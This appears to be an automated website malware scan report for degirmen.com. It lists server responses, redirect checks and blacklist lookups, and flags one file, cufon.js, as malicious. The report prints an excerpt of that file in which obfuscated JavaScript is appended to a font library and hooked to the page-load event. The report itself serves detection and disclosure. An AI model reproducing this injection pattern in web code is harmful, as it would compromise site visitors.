Scanned pages/files
Request | Server response | Status |
http://www.degirmen.com/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 16 May 2014 18:05:17 GMT Pragma: no-cache Location: tr/ Server: nginx Content-Length: 1 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=b95ae169c92b082d7cbeafb5650bfafd; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.degirmen.com/tr/ | 200 OK Content-Length: 162890 Content-Type: text/html | clean |
http://www.degirmen.com/tr/../js/cufon.js | 200 OK Content-Length: 22389 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&& if (window.addEventListener) window.addEventListener('load', pd5ff5e8e2215535, false); else if (window.attachEvent) window.attachEvent('onload', pd5ff5e8e2215535); else { var e533edd91198ea4 = window.onload ; window.onload = function() { if(e533edd91198ea4) { e533edd91198ea4(); } pd5ff5e8e2215535(); } } } w0f7abfc8cd028d(n5b85aa8e53b); Antivirus reports:
| ||
http://www.degirmen.com/../js/font.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
http://www.degirmen.com/test404page.js | HTTP/1.1 302 Found Cache-Control: max-age=2592000 Connection: close Date: Fri, 16 May 2014 18:05:19 GMT Location: http://www.degirmen.com/error404.html Server: nginx Content-Length: 221 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 15 Jun 2014 18:05:19 GMT | clean |
http://www.degirmen.com/error404.html | 200 OK Content-Length: 317 Content-Type: text/html | clean |
http://www.degirmen.com/../js/jquery-1.3.2.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
http://www.degirmen.com/../js/jquery.easing.1.3.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
http://www.degirmen.com/../js/easySlider1.7.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
http://www.degirmen.com/../Scripts/swfobject_modified.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: degirmen.com
Result:
GET / HTTP/1.1
Host: degirmen.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: degirmen.com
Referer: http://www.google.com/search?q=degirmen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: degirmen.com
Referer: http://www.google.com/search?q=degirmen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=degirmen.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://degirmen.com/
Result: degirmen.com is not infected or malware details are not published yet.
Result: degirmen.com is not infected or malware details are not published yet.